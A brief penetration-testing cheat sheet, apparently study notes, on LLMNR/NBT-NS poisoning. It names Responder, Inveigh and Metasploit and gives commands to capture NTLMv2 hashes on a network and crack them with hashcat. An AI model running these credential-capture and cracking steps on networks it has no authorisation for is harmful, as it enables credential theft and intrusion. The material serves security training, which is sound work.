LLMNR/NBT-NS Poisoning

Several tools can be used to attempt LLMNR & NBT-NS poisoning:

Tool	Description
Responder	Responder is a purpose-built tool to poison LLMNR, NBT-NS, and MDNS, with many different functions.
Inveigh	Inveigh is a cross-platform MITM platform that can be used for spoofing and poisoning attacks.
Metasploit	Metasploit has several built-in scanners and spoofing modules made to deal with poisoning attacks.

From Linux

# Starting Responder 
sudo responder -I ens224

# Cracking an NTLMv2 Hash With Hashcat
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt

From Windows

# Using Inveigh C# version, powershell version is not updated
# Compile and run the executable
PS C:\> .\Inveigh.exe

# hit the esc key to enter the console while Inveigh is running.
# After typing HELP and hitting enter, we are presented with several options
# view unique captured hashes by typing GET NTLMV2UNIQUE
# type in GET NTLMV2USERNAMES and see which usernames we have collected